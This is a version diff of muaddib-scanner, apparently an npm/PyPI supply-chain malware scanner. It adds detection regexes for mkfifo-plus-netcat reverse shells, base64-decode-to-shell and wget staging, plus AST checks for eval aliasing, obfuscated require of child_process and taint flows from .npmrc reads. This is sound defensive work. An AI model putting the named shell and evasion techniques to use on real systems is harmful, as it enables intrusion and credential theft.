muaddib-scanner 2.5.12 → 2.5.14

package/logs/alerts/{2026-03-07T16-18-04-719-evil-pkg.json → 2026-03-07T19-15-13-572-evil-pkg.json}

@@ -1,6 +1,6 @@
 {
   "target": "npm/evil-pkg@1.0.0",
-  "timestamp": "2026-03-07T16:18:04.719Z",
+  "timestamp": "2026-03-07T19:15:13.572Z",
   "ecosystem": "npm",
   "summary": {
     "critical": 1,

package/logs/alerts/{2026-03-07T16-18-04-720-suspect-pkg.json → 2026-03-07T19-15-13-572-suspect-pkg.json}

@@ -1,6 +1,6 @@
 {
   "target": "npm/suspect-pkg@1.0",
-  "timestamp": "2026-03-07T16:18:04.720Z",
+  "timestamp": "2026-03-07T19:15:13.572Z",
   "ecosystem": "npm",
   "summary": {
     "critical": 0,

package/logs/alerts/{2026-03-07T16-18-04-720-evil-pkg.json → 2026-03-07T19-15-13-573-evil-pkg.json}

@@ -1,6 +1,6 @@
 {
   "target": "npm/evil-pkg@1.0.0",
-  "timestamp": "2026-03-07T16:18:04.720Z",
+  "timestamp": "2026-03-07T19:15:13.573Z",
   "ecosystem": "npm",
   "summary": {
     "critical": 1,

package/logs/alerts/{2026-03-07T16-18-05-033-evil-pkg.json → 2026-03-07T19-15-13-948-evil-pkg.json}

@@ -1,6 +1,6 @@
 {
   "target": "npm/evil-pkg@2.0.0",
-  "timestamp": "2026-03-07T16:18:05.033Z",
+  "timestamp": "2026-03-07T19:15:13.947Z",
   "ecosystem": "npm",
   "summary": {
     "critical": 1,

package/logs/daily-reports/2026-03-07.json

@@ -1,6 +1,6 @@
 {
   "date": "2026-03-07",
-  "timestamp": "2026-03-07T16:18:05.131Z",
+  "timestamp": "2026-03-07T19:15:14.082Z",
   "embed": {
     "embeds": [
       {
@@ -34,14 +34,14 @@
           },
           {
             "name": "Top Suspects",
-            "value": "1. **npm/test-dedup-detection-1772900284717@1.0.0** — 1 finding(s)",
+            "value": "1. **npm/test-dedup-detection-1772910913569@1.0.0** — 1 finding(s)",
             "inline": false
           }
         ],
         "footer": {
-          "text": "MUAD'DIB - Daily summary | 2026-03-07 16:18:05 UTC"
+          "text": "MUAD'DIB - Daily summary | 2026-03-07 19:15:14 UTC"
         },
-        "timestamp": "2026-03-07T16:18:05.131Z"
+        "timestamp": "2026-03-07T19:15:14.081Z"
       }
     ]
   },

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "muaddib-scanner",
-  "version": "2.5.12",
+  "version": "2.5.14",
   "description": "Supply-chain threat detection & response for npm & PyPI/Python",
   "main": "src/index.js",
   "bin": {

package/src/ioc/scraper.js

@@ -1226,8 +1226,18 @@ async function runScraper() {
   }
   try {
     const tmpHomeFile = HOME_IOC_FILE + '.tmp';
-    fs.writeFileSync(tmpHomeFile, JSON.stringify(existingIOCs, null, 2));
+    const homeJsonData = JSON.stringify(existingIOCs, null, 2);
+    fs.writeFileSync(tmpHomeFile, homeJsonData);
+    // Write HMAC before rename for consistency with updater.js
+    const { generateIOCHMAC } = require('./updater.js');
+    const homeHmac = generateIOCHMAC(homeJsonData);
+    fs.writeFileSync(HOME_IOC_FILE + '.hmac', homeHmac);
     fs.renameSync(tmpHomeFile, HOME_IOC_FILE);
+    // Mark HMAC as initialized
+    const hmacMarker = path.join(homeDir, '.hmac-initialized');
+    if (!fs.existsSync(hmacMarker)) {
+      try { fs.writeFileSync(hmacMarker, new Date().toISOString()); } catch {}
+    }
     saveSpinner.succeed('Saved IOCs + compact format + home directory');
   } catch (e) {
     saveSpinner.succeed('Saved IOCs + compact format (home dir write failed: ' + e.message + ')');

package/src/ioc/updater.js

@@ -100,14 +100,19 @@ async function updateIOCs() {
   delete baseIOCs._fileSet;
 
   // Atomic write: write to .tmp then rename (UP-001)
+  // HMAC written BEFORE rename to prevent race condition (crash between rename and HMAC write)
   const tmpFile = CACHE_IOC_FILE + '.tmp';
   const jsonData = JSON.stringify(baseIOCs);
   fs.writeFileSync(tmpFile, jsonData);
-  fs.renameSync(tmpFile, CACHE_IOC_FILE);
-
-  // Write HMAC signature alongside the cache file
   const hmac = generateIOCHMAC(jsonData);
   fs.writeFileSync(CACHE_IOC_FILE + '.hmac', hmac);
+  fs.renameSync(tmpFile, CACHE_IOC_FILE);
+
+  // Mark HMAC as initialized — future loads require HMAC presence
+  const hmacMarker = path.join(HOME_DATA_PATH, '.hmac-initialized');
+  if (!fs.existsSync(hmacMarker)) {
+    try { fs.writeFileSync(hmacMarker, new Date().toISOString()); } catch {}
+  }
 
   const totalNpm = baseIOCs.packages.length;
   const totalPyPI = (baseIOCs.pypi_packages || []).length;
@@ -236,8 +241,15 @@ function loadCachedIOCs() {
           mergeIOCs(merged, JSON.parse(cachedData));
         }
       } else {
-        // No HMAC file yet (first run or pre-HMAC version) — load but warn
-        mergeIOCs(merged, JSON.parse(cachedData));
+        // No HMAC file — check if HMAC was previously initialized
+        const hmacMarker = path.join(HOME_DATA_PATH, '.hmac-initialized');
+        if (fs.existsSync(hmacMarker)) {
+          // HMAC was initialized before but .hmac file is missing → possible tampering
+          console.log('[WARN] IOC cache HMAC file missing but was previously initialized — skipping cache.');
+        } else {
+          // First run or pre-HMAC version — load but warn
+          mergeIOCs(merged, JSON.parse(cachedData));
+        }
       }
     } catch (e) {
       console.log('[WARN] Failed to load cached IOCs: ' + e.message);
@@ -443,6 +455,13 @@ function invalidateCache() {
 // ============================================
 // Key is derived from a stable machine-specific seed + hardcoded salt.
 // This protects against local file tampering by unauthorized processes.
+//
+// RISK ACCEPTED (v2.5.14): Full cryptographic signing of IOC updates (e.g., Ed25519
+// signatures verified against a pinned public key) was evaluated but not implemented.
+// Current mitigations: HTTPS-only downloads + domain allowlist in src/shared/download.js
+// + HMAC-SHA256 integrity for cached data. The HMAC key is machine-local, so it does
+// not protect against a compromised upstream source — that risk is accepted given the
+// cost/benefit trade-off and the existing HTTPS + domain pinning controls.
 const IOC_HMAC_SALT = 'muaddib-ioc-integrity-v1';
 
 function getIOCHMACKey() {

package/src/response/playbooks.js

@@ -165,6 +165,15 @@ const PLAYBOOKS = {
   fifo_reverse_shell:
     'CRITIQUE: Reverse shell FIFO/named pipe detecte. Machine potentiellement compromise. Isoler immediatement.',
 
+  fifo_nc_reverse_shell:
+    'CRITIQUE: Reverse shell via mkfifo + netcat detecte. Machine potentiellement compromise. Isoler immediatement. Verifier les connexions sortantes actives.',
+
+  base64_decode_exec:
+    'CRITIQUE: Payload encode en base64 pipe vers un shell. Decoder le payload pour analyse: echo "<payload>" | base64 -d. Isoler la machine si deja execute.',
+
+  wget_base64_decode:
+    'Telechargement + decodage base64 detecte. Verifier l\'URL de telechargement et decoder le contenu. Pattern de staging malveillant en deux etapes.',
+
   shai_hulud_backdoor:
     'CRITIQUE: Backdoor Shai-Hulud dans GitHub Actions. Supprimer le workflow et auditer les runs precedents.',
 
@@ -448,6 +457,10 @@ const PLAYBOOKS = {
     'new Worker() avec eval:true detecte. Le code s\'execute dans un thread worker separe, contournant la detection AST du thread principal. ' +
     'Verifier le contenu du code passe au Worker. Si dynamique ou obfusque, supprimer le package. ' +
     'Analyser les communications inter-threads (parentPort, workerData) pour identifier le payload.',
+
+  fragmented_high_entropy_cluster:
+    'Cluster de chaines courtes a haute entropie detecte. Possible fragmentation de payload pour eviter la detection. ' +
+    'Reconstituer les fragments et analyser le contenu combine. Verifier si les chaines sont concatenees ou reassemblees a l\'execution.',
 };
 
 function getPlaybook(threatType) {

package/src/rules/index.js

@@ -385,6 +385,33 @@ const RULES = {
     references: ['https://attack.mitre.org/techniques/T1059/004/'],
     mitre: 'T1059.004'
   },
+  fifo_nc_reverse_shell: {
+    id: 'MUADDIB-SHELL-013',
+    name: 'FIFO + Netcat Reverse Shell',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Reverse shell via mkfifo + netcat (sans /dev/tcp). Technique alternative de reverse shell utilisant un named pipe.',
+    references: ['https://attack.mitre.org/techniques/T1059/004/'],
+    mitre: 'T1059.004'
+  },
+  base64_decode_exec: {
+    id: 'MUADDIB-SHELL-014',
+    name: 'Base64 Decode Pipe to Shell',
+    severity: 'CRITICAL',
+    confidence: 'high',
+    description: 'Payload encode en base64 decode et pipe vers bash/sh. Technique d\'obfuscation courante pour cacher des commandes malveillantes.',
+    references: ['https://attack.mitre.org/techniques/T1140/'],
+    mitre: 'T1140'
+  },
+  wget_base64_decode: {
+    id: 'MUADDIB-SHELL-015',
+    name: 'Wget + Base64 Decode',
+    severity: 'HIGH',
+    confidence: 'high',
+    description: 'Telechargement via wget suivi de decodage base64. Pattern de staging en deux etapes pour dropper un payload.',
+    references: ['https://attack.mitre.org/techniques/T1105/'],
+    mitre: 'T1105'
+  },
 
   // AST additional patterns
   possible_obfuscation: {
@@ -958,6 +985,15 @@ const RULES = {
     references: ['https://attack.mitre.org/techniques/T1027/'],
     mitre: 'T1027'
   },
+  fragmented_high_entropy_cluster: {
+    id: 'MUADDIB-ENTROPY-004',
+    name: 'Fragmented High Entropy Cluster',
+    severity: 'MEDIUM',
+    confidence: 'medium',
+    description: 'Cluster de chaines courtes a haute entropie (8-49 chars) detecte. Technique de fragmentation de payload pour contourner le seuil de longueur minimum d\'analyse entropique.',
+    references: ['https://attack.mitre.org/techniques/T1027/'],
+    mitre: 'T1027'
+  },
   js_obfuscation_pattern: {
     id: 'MUADDIB-ENTROPY-003',
     name: 'JS Obfuscation Pattern',

package/src/scanner/ast-detectors.js

@@ -330,6 +330,44 @@ function handleVariableDeclarator(node, ctx) {
       ctx.globalThisAliases.add(node.id.name);
     }
 
+    // B1: const E = eval; const F = Function;
+    if (node.init?.type === 'Identifier' &&
+        (node.init.name === 'eval' || node.init.name === 'Function')) {
+      ctx.evalAliases.set(node.id.name, node.init.name);
+    }
+    // B1: const E = (x) => eval(x); const E = function(x) { return eval(x); }
+    if ((node.init?.type === 'ArrowFunctionExpression' || node.init?.type === 'FunctionExpression') &&
+        node.init.params?.length >= 1) {
+      const body = node.init.body;
+      if (body?.type === 'CallExpression') {
+        const cn = getCallName(body);
+        if (cn === 'eval' || cn === 'Function') ctx.evalAliases.set(node.id.name, cn);
+      }
+      if (body?.type === 'BlockStatement' && body.body?.length === 1 &&
+          body.body[0].type === 'ReturnStatement' && body.body[0].argument?.type === 'CallExpression') {
+        const cn = getCallName(body.body[0].argument);
+        if (cn === 'eval' || cn === 'Function') ctx.evalAliases.set(node.id.name, cn);
+      }
+    }
+
+    // B5: Track object literal string properties
+    if (node.init?.type === 'ObjectExpression') {
+      const propMap = new Map();
+      for (const prop of node.init.properties) {
+        if (prop.type !== 'Property') continue;
+        const key = prop.key?.type === 'Identifier' ? prop.key.name :
+                    (prop.key?.type === 'Literal' ? String(prop.key.value) : null);
+        const val = extractStringValueDeep(prop.value);
+        if (key && val) propMap.set(key, val);
+      }
+      if (propMap.size > 0) ctx.objectPropertyMap.set(node.id.name, propMap);
+    }
+
+    // Track initial string values for reassignment tracking
+    if (strVal !== null && strVal !== undefined) {
+      ctx.stringVarValues.set(node.id.name, strVal);
+    }
+
     // Track variables assigned from path.join containing .github/workflows
     if (node.init?.type === 'CallExpression' && node.init.callee?.type === 'MemberExpression') {
       const obj = node.init.callee.object;
@@ -442,17 +480,68 @@ function handleCallExpression(node, ctx) {
         });
       }
     } else if (arg.type === 'Identifier') {
-      // If the variable was assigned from a static value (string literal,
-      // array of strings, object with string values), it's a plugin loader pattern
-      const severity = ctx.staticAssignments.has(arg.name) ? 'LOW' : 'HIGH';
-      ctx.threats.push({
-        type: 'dynamic_require',
-        severity,
-        message: severity === 'LOW'
-          ? `Dynamic require() with statically-assigned variable "${arg.name}" (plugin loader pattern).`
-          : 'Dynamic require() with variable argument (module name obfuscation).',
-        file: ctx.relFile
-      });
+      // Check if variable was reassignment-tracked to a dangerous module
+      const DANGEROUS_MODS_REQ = ['child_process', 'fs', 'net', 'dns', 'http', 'https', 'tls'];
+      const resolvedVal = ctx.stringVarValues?.get(arg.name);
+      if (resolvedVal) {
+        const norm = resolvedVal.startsWith('node:') ? resolvedVal.slice(5) : resolvedVal;
+        if (DANGEROUS_MODS_REQ.includes(norm)) {
+          ctx.threats.push({
+            type: 'dynamic_require', severity: 'CRITICAL',
+            message: `require(${arg.name}) resolves to "${norm}" via variable reassignment — module name obfuscation.`,
+            file: ctx.relFile
+          });
+        } else {
+          // If the variable was assigned from a static value (string literal,
+          // array of strings, object with string values), it's a plugin loader pattern
+          const severity = ctx.staticAssignments.has(arg.name) ? 'LOW' : 'HIGH';
+          ctx.threats.push({
+            type: 'dynamic_require',
+            severity,
+            message: severity === 'LOW'
+              ? `Dynamic require() with statically-assigned variable "${arg.name}" (plugin loader pattern).`
+              : 'Dynamic require() with variable argument (module name obfuscation).',
+            file: ctx.relFile
+          });
+        }
+      } else {
+        // If the variable was assigned from a static value (string literal,
+        // array of strings, object with string values), it's a plugin loader pattern
+        const severity = ctx.staticAssignments.has(arg.name) ? 'LOW' : 'HIGH';
+        ctx.threats.push({
+          type: 'dynamic_require',
+          severity,
+          message: severity === 'LOW'
+            ? `Dynamic require() with statically-assigned variable "${arg.name}" (plugin loader pattern).`
+            : 'Dynamic require() with variable argument (module name obfuscation).',
+          file: ctx.relFile
+        });
+      }
+    }
+    // B5: require(obj.prop) — MemberExpression argument
+    else if (arg.type === 'MemberExpression') {
+      const objName = arg.object?.type === 'Identifier' ? arg.object.name : null;
+      const propName = arg.property?.type === 'Identifier' ? arg.property.name :
+                       (arg.property?.type === 'Literal' ? String(arg.property.value) : null);
+      const DANGEROUS_MODS = ['child_process', 'fs', 'net', 'dns', 'http', 'https', 'tls'];
+      let resolved = false;
+      if (objName && propName && ctx.objectPropertyMap?.has(objName)) {
+        const val = ctx.objectPropertyMap.get(objName).get(propName);
+        if (val) {
+          const norm = val.startsWith('node:') ? val.slice(5) : val;
+          if (DANGEROUS_MODS.includes(norm)) {
+            ctx.threats.push({ type: 'dynamic_require', severity: 'CRITICAL',
+              message: `require(${objName}.${propName}) resolves to "${norm}" — object property indirection.`,
+              file: ctx.relFile });
+            resolved = true;
+          }
+        }
+      }
+      if (!resolved) {
+        ctx.threats.push({ type: 'dynamic_require', severity: 'HIGH',
+          message: 'Dynamic require() with member expression argument (object property obfuscation).',
+          file: ctx.relFile });
+      }
     }
     // Wave 4: detect require() of .node binary files (native addon camouflage)
     const reqStr = extractStringValueDeep(arg);
@@ -881,6 +970,19 @@ function handleCallExpression(node, ctx) {
     }
   }
 
+  // B1: Alias call — E('code') where E = eval or F = Function
+  if (node.callee.type === 'Identifier' && ctx.evalAliases?.has(node.callee.name)) {
+    const aliased = ctx.evalAliases.get(node.callee.name);
+    ctx.hasEvalInFile = true;
+    ctx.hasDynamicExec = true;
+    ctx.threats.push({
+      type: aliased === 'eval' ? 'dangerous_call_eval' : 'dangerous_call_function',
+      severity: 'HIGH',
+      message: `Indirect ${aliased} via alias "${node.callee.name}" — eval wrapper evasion.`,
+      file: ctx.relFile
+    });
+  }
+
   if (callName === 'eval') {
     ctx.hasEvalInFile = true;
     ctx.hasDynamicExec = true;
@@ -1432,6 +1534,29 @@ function handleLiteral(node, ctx) {
 }
 
 function handleAssignmentExpression(node, ctx) {
+  // Variable reassignment: x += 'process' or x = x + 'process'
+  if (node.left?.type === 'Identifier') {
+    if (node.operator === '+=' && ctx.stringVarValues.has(node.left.name)) {
+      const rightVal = extractStringValueDeep(node.right);
+      if (rightVal !== null) {
+        const combined = ctx.stringVarValues.get(node.left.name) + rightVal;
+        ctx.stringVarValues.set(node.left.name, combined);
+        if (DANGEROUS_CMD_PATTERNS.some(p => p.test(combined))) {
+          ctx.dangerousCmdVars.set(node.left.name, combined);
+        }
+      }
+    }
+    if (node.operator === '=' && node.right?.type === 'BinaryExpression') {
+      const resolved = resolveStringConcat(node.right);
+      if (resolved) {
+        ctx.stringVarValues.set(node.left.name, resolved);
+        if (DANGEROUS_CMD_PATTERNS.some(p => p.test(resolved))) {
+          ctx.dangerousCmdVars.set(node.left.name, resolved);
+        }
+      }
+    }
+  }
+
   // Detect object property indirection: obj.exec = require('child_process').exec
   // or obj.fn = eval — stashing dangerous functions in object properties
   if (node.left?.type === 'MemberExpression' && node.right) {
@@ -1489,14 +1614,17 @@ function handleAssignmentExpression(node, ctx) {
   if (node.left?.type === 'MemberExpression') {
     const left = node.left;
 
-    // globalThis.fetch = ... or globalThis.XMLHttpRequest = ...
-    if (left.object?.type === 'Identifier' && left.object.name === 'globalThis' &&
+    // globalThis.fetch = ... or globalThis.XMLHttpRequest = ... (B2: include aliases)
+    if (left.object?.type === 'Identifier' &&
+        (left.object.name === 'globalThis' || left.object.name === 'global' ||
+         left.object.name === 'window' || left.object.name === 'self' ||
+         ctx.globalThisAliases.has(left.object.name)) &&
         left.property?.type === 'Identifier') {
       if (HOOKABLE_NATIVES.includes(left.property.name)) {
         ctx.threats.push({
           type: 'prototype_hook',
           severity: 'HIGH',
-          message: `globalThis.${left.property.name} overridden — native API hooking for traffic interception.`,
+          message: `${left.object.name}.${left.property.name} overridden — native API hooking for traffic interception.`,
           file: ctx.relFile
         });
       }
@@ -1712,7 +1840,8 @@ function handlePostWalk(ctx) {
 
   // Wave 4: Download-execute-cleanup — https download + chmod executable + execSync + unlink
   // Exclude when all URLs in the file point to safe registries (npm, GitHub, nodejs.org)
-  if (ctx.hasRemoteFetch && ctx.hasChmodExecutable && ctx.hasExecSyncCall && !ctx.fetchOnlySafeDomains) {
+  // B4: removed fetchOnlySafeDomains guard — compound requires fetch+chmod+exec, which is never legitimate
+  if (ctx.hasRemoteFetch && ctx.hasChmodExecutable && ctx.hasExecSyncCall) {
     ctx.threats.push({
       type: 'download_exec_binary',
       severity: 'CRITICAL',

package/src/scanner/ast.js

@@ -70,6 +70,9 @@ function analyzeFile(content, filePath, basePath) {
     workflowPathVars: new Set(),
     execPathVars: new Map(),
     globalThisAliases: new Set(),
+    evalAliases: new Map(),           // B1: variable name → 'eval'|'Function'
+    objectPropertyMap: new Map(),     // B5: objName → Map<propName, stringValue>
+    stringVarValues: new Map(),       // Variable reassignment tracking: varName → string value
     hasFromCharCode: content.includes('fromCharCode'),
     hasJsReverseShell: /\bnet\.Socket\b/.test(content) &&
       /\.connect\s*\(/.test(content) &&

package/src/scanner/dataflow.js

@@ -203,6 +203,33 @@ function analyzeFile(content, filePath, basePath) {
             }
           }
         }
+        // B7: Taint propagation through data-preserving wrappers
+        if (initNode.type === 'CallExpression') {
+          const callee = initNode.callee;
+          let isTaintWrapper = false;
+          // JSON.stringify(x) / JSON.parse(x)
+          if (callee?.type === 'MemberExpression' &&
+              callee.object?.type === 'Identifier' && callee.object.name === 'JSON' &&
+              callee.property?.type === 'Identifier' &&
+              (callee.property.name === 'stringify' || callee.property.name === 'parse')) {
+            isTaintWrapper = true;
+          }
+          // x.toString() / String(x) / Buffer.from(x)
+          if (callee?.type === 'MemberExpression' &&
+              callee.property?.type === 'Identifier' && callee.property.name === 'toString') {
+            isTaintWrapper = true;
+          }
+          if (callee?.type === 'Identifier' && callee.name === 'String') {
+            isTaintWrapper = true;
+          }
+          if (isTaintWrapper && initNode.arguments.length >= 1) {
+            const wrappedArg = initNode.arguments[0];
+            if (wrappedArg.type === 'Identifier' && sensitivePathVars.has(wrappedArg.name)) {
+              sensitivePathVars.add(node.id.name);
+            }
+          }
+        }
+
         // Track exec result capture: const output = execSync('cmd')
         if (initNode.type === 'CallExpression') {
           let execName = null;
@@ -246,6 +273,16 @@ function analyzeFile(content, filePath, basePath) {
             name: callName,
             line: node.loc?.start?.line
           });
+          // 4.2: fs.readFile callback data tainting
+          // fs.readFile('.npmrc', (err, data) => {...}) — taint `data` param
+          if (callName === 'readFile' || callName === 'fs.readFile') {
+            const lastArg = node.arguments[node.arguments.length - 1];
+            if (lastArg && (lastArg.type === 'FunctionExpression' || lastArg.type === 'ArrowFunctionExpression')) {
+              if (lastArg.params && lastArg.params.length >= 2 && lastArg.params[1].type === 'Identifier') {
+                sensitivePathVars.add(lastArg.params[1].name);
+              }
+            }
+          }
         }
       }
 
@@ -267,6 +304,35 @@ function analyzeFile(content, filePath, basePath) {
         }
       }
 
+      // 4.1: Promise .then() callback tainting
+      // fs.promises.readFile('.npmrc').then(data => fetch(url, {body: data}))
+      // Detect .then() on a call to fs.promises.readFile with sensitive path
+      if (node.callee.type === 'MemberExpression' &&
+          node.callee.property?.type === 'Identifier' && node.callee.property.name === 'then' &&
+          node.callee.object?.type === 'CallExpression') {
+        const innerCall = node.callee.object;
+        // Check if inner call is fs.promises.readFile(sensitivePath)
+        if (innerCall.callee?.type === 'MemberExpression' &&
+            innerCall.callee.object?.type === 'MemberExpression') {
+          const outerObj2 = innerCall.callee.object.object;
+          const mid2 = innerCall.callee.object.property;
+          const method2 = innerCall.callee.property;
+          if (outerObj2?.type === 'Identifier' && mid2?.type === 'Identifier' && mid2.name === 'promises' &&
+              method2?.type === 'Identifier' && method2.name === 'readFile') {
+            const isFs2 = outerObj2.name === 'fs' || (taintMap.get(outerObj2.name)?.source === 'fs');
+            if (isFs2 && innerCall.arguments[0] && isCredentialPath(innerCall.arguments[0], sensitivePathVars)) {
+              // Taint the first param of the .then() callback
+              const thenCb = node.arguments[0];
+              if (thenCb && (thenCb.type === 'FunctionExpression' || thenCb.type === 'ArrowFunctionExpression')) {
+                if (thenCb.params && thenCb.params.length >= 1 && thenCb.params[0].type === 'Identifier') {
+                  sensitivePathVars.add(thenCb.params[0].name);
+                }
+              }
+            }
+          }
+        }
+      }
+
       if (callName === 'request' || callName === 'fetch' || callName === 'post' || callName === 'get') {
         sinks.push({
           type: 'network_send',

package/src/scanner/deobfuscate.js

@@ -47,6 +47,24 @@ function deobfuscate(sourceCode) {
       });
     },
 
+    // ---- 1b. TEMPLATE LITERAL FOLDING ----
+    // `child_process` → 'child_process' (no expression templates)
+    // `child_${'process'}` → 'child_process' (with resolvable expressions)
+    TemplateLiteral(node) {
+      const folded = tryFoldConcat(node);
+      if (folded === null) return;
+      const before = sourceCode.slice(node.start, node.end);
+      const after = quoteString(folded);
+      if (before === after) return; // no change
+      replacements.push({
+        start: node.start,
+        end: node.end,
+        value: after,
+        type: 'template_literal',
+        before
+      });
+    },
+
     // ---- 2. CHARCODE REBUILD + 3. BASE64 DECODE ----
     CallExpression(node) {
       // String.fromCharCode(99, 104, 105, 108, 100) → "child"
@@ -199,14 +217,30 @@ function propagateConsts(sourceCode) {
     VariableDeclaration(node) {
       if (node.kind !== 'const') return;
       for (const decl of node.declarations) {
-        if (decl.id?.type !== 'Identifier') continue;
         if (!decl.init) continue;
-        if (decl.init.type === 'Literal' && typeof decl.init.value === 'string') {
-          constMap.set(decl.id.name, {
-            value: decl.init.value,
-            declStart: decl.init.start,
-            declEnd: decl.init.end
-          });
+        // Standard: const x = 'literal'
+        if (decl.id?.type === 'Identifier') {
+          if (decl.init.type === 'Literal' && typeof decl.init.value === 'string') {
+            constMap.set(decl.id.name, {
+              value: decl.init.value,
+              declStart: decl.init.start,
+              declEnd: decl.init.end
+            });
+          }
+        }
+        // Array destructuring: const [a, b] = ['child_', 'process']
+        if (decl.id?.type === 'ArrayPattern' && decl.init?.type === 'ArrayExpression') {
+          for (let i = 0; i < decl.id.elements.length && i < decl.init.elements.length; i++) {
+            if (decl.id.elements[i]?.type === 'Identifier' &&
+                decl.init.elements[i]?.type === 'Literal' &&
+                typeof decl.init.elements[i].value === 'string') {
+              constMap.set(decl.id.elements[i].name, {
+                value: decl.init.elements[i].value,
+                declStart: decl.init.elements[i].start,
+                declEnd: decl.init.elements[i].end
+              });
+            }
+          }
         }
       }
     },
@@ -349,6 +383,23 @@ function tryFoldConcat(node, depth) {
   if (node.type === 'Literal' && typeof node.value === 'string') {
     return node.value;
   }
+  // TemplateLiteral without expressions → direct string
+  if (node.type === 'TemplateLiteral' && node.expressions.length === 0) {
+    return node.quasis.map(q => q.value.cooked).join('');
+  }
+  // TemplateLiteral with resolvable expressions
+  if (node.type === 'TemplateLiteral' && node.expressions.length > 0) {
+    const parts = [];
+    for (let i = 0; i < node.quasis.length; i++) {
+      parts.push(node.quasis[i].value.cooked);
+      if (i < node.expressions.length) {
+        const v = tryFoldConcat(node.expressions[i], depth + 1);
+        if (v === null) return null;
+        parts.push(v);
+      }
+    }
+    return parts.join('');
+  }
   if (node.type === 'BinaryExpression' && node.operator === '+') {
     const left = tryFoldConcat(node.left, depth + 1);
     if (left === null) return null;

package/src/scanner/entropy.js

@@ -228,7 +228,26 @@ function scanEntropy(targetPath, options = {}) {
     const strings = extractStringLiterals(content);
     for (const str of strings) {
       if (str.length < MIN_STRING_LENGTH) continue;
-      if (str.length > MAX_STRING_LENGTH) continue;
+
+      // B12: Windowed analysis for strings > MAX_STRING_LENGTH
+      if (str.length > MAX_STRING_LENGTH) {
+        if (SOURCE_MAP_REGEX.test(str) || SHA256_HEX_REGEX.test(str)) continue;
+        const WINDOW = 500, WIN_THRESHOLD = 6.0;
+        for (let i = 0; i < str.length; i += WINDOW) {
+          const w = str.slice(i, i + WINDOW);
+          if (w.length < 20) continue;
+          if (calculateShannonEntropy(w) > WIN_THRESHOLD) {
+            threats.push({
+              type: 'high_entropy_string',
+              severity: ENCODING_TABLE_RE.test(relativePath) ? 'LOW' : 'MEDIUM',
+              message: `High entropy window in long string (${str.length} chars, offset ${i}) — possible padded payload`,
+              file: relativePath
+            });
+            break;
+          }
+        }
+        continue;
+      }
 
       // Skip whitelisted patterns
       if (isWhitelistedString(str, relativePath)) continue;
@@ -245,6 +264,23 @@ function scanEntropy(targetPath, options = {}) {
         });
       }
     }
+
+    // B11: Fragment cluster — many short high-entropy strings = payload fragmentation
+    const FRAG_MIN = 8, FRAG_MAX = 49, FRAG_COUNT = 5, FRAG_ENTROPY = 4.5;
+    const frags = strings.filter(s =>
+      s.length >= FRAG_MIN && s.length <= FRAG_MAX &&
+      !SOURCE_MAP_REGEX.test(s) && !SHA256_HEX_REGEX.test(s) && !MD5_HEX_REGEX.test(s) &&
+      !UUID_REGEX.test(s) && !JWT_REGEX.test(s) &&
+      calculateShannonEntropy(s) > FRAG_ENTROPY
+    );
+    if (frags.length >= FRAG_COUNT) {
+      threats.push({
+        type: 'fragmented_high_entropy_cluster',
+        severity: ENCODING_TABLE_RE.test(relativePath) ? 'LOW' : 'MEDIUM',
+        message: `Fragment cluster: ${frags.length} short high-entropy strings (8-49 chars) — possible payload fragmentation.`,
+        file: relativePath
+      });
+    }
   });
 
   return threats;

package/src/scanner/shell.js

@@ -16,7 +16,10 @@ const MALICIOUS_PATTERNS = [
   { pattern: /(?:cat|readFile|cp|mv|curl\s+file:\/\/|tar\s+.*|scp\s+).*\.ssh/m, name: 'ssh_access', severity: 'HIGH' },
   { pattern: /python\s+-c.*import\s+socket/m, name: 'python_reverse_shell', severity: 'CRITICAL' },
   { pattern: /perl\s+-e.*socket/m, name: 'perl_reverse_shell', severity: 'CRITICAL' },
-  { pattern: /mkfifo.*\/dev\/tcp/m, name: 'fifo_reverse_shell', severity: 'CRITICAL' }
+  { pattern: /mkfifo.*\/dev\/tcp/m, name: 'fifo_reverse_shell', severity: 'CRITICAL' },
+  { pattern: /mkfifo\s+\S+.*(?:\|\s*nc\s|nc\s+\S+.*>\s*\/tmp\/)/m, name: 'fifo_nc_reverse_shell', severity: 'CRITICAL' },
+  { pattern: /base64\s+-d\b.*\|\s*(ba)?sh/m, name: 'base64_decode_exec', severity: 'CRITICAL' },
+  { pattern: /wget\s+\S+.*&&.*base64\s+-d/m, name: 'wget_base64_decode', severity: 'HIGH' }
 ];
 
 async function scanShellScripts(targetPath) {

package/src/scanner/typosquat.js

@@ -116,6 +116,20 @@ const WHITELIST = new Set([
 ]);
 
 
+// B13: Pair-aware whitelist — only skip comparison with the specific popular package
+const WHITELIST_PAIRS = new Map([
+  ['chai', 'chalk'], ['pino', 'sinon'], ['ioredis', 'redis'],
+  ['bcryptjs', 'bcrypt'], ['recast', 'react'], ['asyncdi', 'async'],
+  ['redux', 'redis'], ['args', 'yargs'], ['oxlint', 'eslint'], ['vasync', 'async'],
+  ['conf', 'config'], ['defu', 'debug'], ['ohash', 'lodash'], ['cors', 'colors'],
+  ['meant', 'react'], ['whelk', 'chalk'], ['tslog', 'tslib'], ['mkdist', 'mkdirp'],
+  ['jshint', 'eslint'], ['dtslint', 'eslint'], ['redis', 'redux'],
+  ['cypress', 'express'], ['colord', 'colors'], ['read', 'react'],
+  ['ulid', 'uuid'], ['tslint', 'eslint'], ['jison', 'sinon'],
+  ['reds', 'redis'], ['docdash', 'lodash'], ['yarpm', 'yargs'],
+  ['canvg', 'canvas'], ['mocks', 'mocha'], ['reactor', 'react']
+]);
+
 // Pre-computed lowercase versions for performance
 const POPULAR_PACKAGES_LOWER = POPULAR_PACKAGES.map(p => p.toLowerCase());
 
@@ -317,9 +331,9 @@ async function scanTyposquatting(targetPath) {
 function findTyposquatMatch(name) {
   const nameLower = name.toLowerCase();
   
-  // Ignore les packages whitelistes
-  if (WHITELIST.has(nameLower)) return null;
-  
+  // Ignore les packages whitelistes (B13: only skip entirely if not in pair-aware map)
+  if (WHITELIST.has(nameLower) && !WHITELIST_PAIRS.has(nameLower)) return null;
+
   // Ignore les packages scoped (@org/package)
   if (name.startsWith('@')) return null;
 
@@ -329,6 +343,9 @@ function findTyposquatMatch(name) {
   // Ignore les packages avec suffixes legitimes courants
   if (isLegitimateVariant(nameLower)) return null;
 
+  // B13: Get the specific popular package this whitelisted name is paired with
+  const pairedTarget = WHITELIST_PAIRS.get(nameLower);
+
   for (let i = 0; i < POPULAR_PACKAGES.length; i++) {
     const popularLower = POPULAR_PACKAGES_LOWER[i];
     const popular = POPULAR_PACKAGES[i];
